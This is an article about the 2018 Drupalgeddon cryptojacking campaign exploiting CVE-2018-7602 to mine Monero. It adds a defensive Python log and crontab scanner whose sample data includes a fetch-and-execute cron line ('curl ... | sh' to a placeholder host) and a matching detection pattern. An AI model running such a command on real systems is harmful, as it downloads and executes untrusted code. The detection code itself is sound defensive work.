During 2017 and part of this year, cryptojacking incidents have caused numerous problems and drawn a large number of complaints and criticisms of websites that use the computing power of their visitors' desktop, laptop and, in some cases, mobile devices in order to mine Monero.
The most notorious case has been the PirateBay site, which has even established a set of policies for mining Monero through its website. However, a very peculiar attack based on the same cryptojacking principle is taking place, and it has been compromising the security of the Drupal e-commerce platform.
The Drupal open source content management system is currently used by millions of users worldwide, notably e-commerce and content management companies that base their websites on this system, known for its good fit for that category of website.
But this platform has been repeatedly hit by a cyber attack that has been called the “Drupalgeddon virus”, which has persisted with renewed strength despite the fact that Drupal Security Labs released a software patch in March 2018 to fix the security vulnerability.
This is not the first time since Drupal's founding in 2000 that the platform has been the target of cyber attacks, but what complicates the scenario with this new attack is the criminality surrounding it. The vulnerability has been identified as CVE-2018-7602, and the malware that exploits it delivers illegal cryptocurrency-mining software to victims' machines.
After infiltrating victims' computers and effectively hijacking their computing power, the malware exploiting CVE-2018-7602 mines the cryptocurrency Monero (XMR), the favorite cryptocurrency of hackers: statistics attribute to it more than 85 per cent of all cryptojacking cases and more than $175 million mined in XMR alone in 2018.
These figures are too alarming to leave the authorities unmoved, and they should provoke a serious discussion on the need for more effective punitive regulations to prevent and punish this kind of cryptocurrency crime.
The attack process begins with the download of a shell script, followed by an Executable and Linkable Format (ELF) downloader that adds a crontab entry. Security controls are evaded to install mining malware, taking advantage of Drupal's failure to sanitize “#” characters in URLs.
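As an added example (not code from the article or from the Drupal project), a small Python check that a site operator could run over a web access log and a crontab file to spot the two indicators named above: query parameters carrying a “#” character, and cron entries that fetch and execute remote content. The log lines, crontab and IP addresses are constructed samples, and the combined log format is assumed.

```python
"""Added example (not from the article or from Drupal): scan a web access log
and a crontab for two indicators of the chain described above.  The log lines
and crontab below are constructed samples in the common combined log format."""
import re
from urllib.parse import urlsplit, parse_qsl

ACCESS_LOG = """\
203.0.113.5 - - [10/May/2018:12:00:01 +0000] "GET /user/password?destination=node/1%23bar HTTP/1.1" 200 512
198.51.100.7 - - [10/May/2018:12:00:02 +0000] "GET /node/1?page=2 HTTP/1.1" 200 2048
"""

CRONTAB = """\
# constructed sample crontab
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://example.invalid/x.sh | sh
"""

REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+"')
# Download tool whose output is piped to a shell, or followed by chmod.
CRON_RE = re.compile(r"\b(curl|wget)\b.*(\|\s*(ba)?sh\b|[;&]+\s*chmod\b)")


def suspicious_requests(log: str) -> list:
    """Return (client_ip, url, offending_params) for requests whose decoded
    query parameters contain '#'.  A browser never sends the fragment part of
    a URL, so a '#' that reaches the server was either encoded as %23 or sent
    by a tool; either way it deserves a look on a Drupal site."""
    hits = []
    for line in log.splitlines():
        m = REQ_RE.search(line)
        if not m:
            continue
        url = m.group("url")
        parts = urlsplit(url)
        params = parse_qsl(parts.query, keep_blank_values=True)  # %23 -> '#'
        bad = [(k, v) for k, v in params if "#" in k or "#" in v]
        if bad or parts.fragment:  # a raw '#' in the request line also counts
            hits.append((line.split()[0], url, bad))
    return hits


def suspicious_cron_entries(crontab: str) -> list:
    """Return non-comment crontab lines that fetch and execute remote content,
    the persistence pattern of the ELF downloader described in the article."""
    return [l for l in crontab.splitlines()
            if l.strip() and not l.lstrip().startswith("#") and CRON_RE.search(l)]
```

Real logs will need the regexes tuned to the local log format and to the download tools actually in use on the host.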
Beyond cryptojacking as such, hackers exploit the vulnerability to take control of multiple Drupal sites and install distributed denial of service (DDoS) malware and software backdoors for long-term access, creating an authentic nightmare.
Drupal has released updated patches to protect its users from these threats, and therefore recommends updating constantly to protect their machines and avoid both the loss of their PCs' computing capacity and other, more complicated situations arising from these cyber attacks. Prevention is a task for all users, together with the recommendations and security updates of software service providers.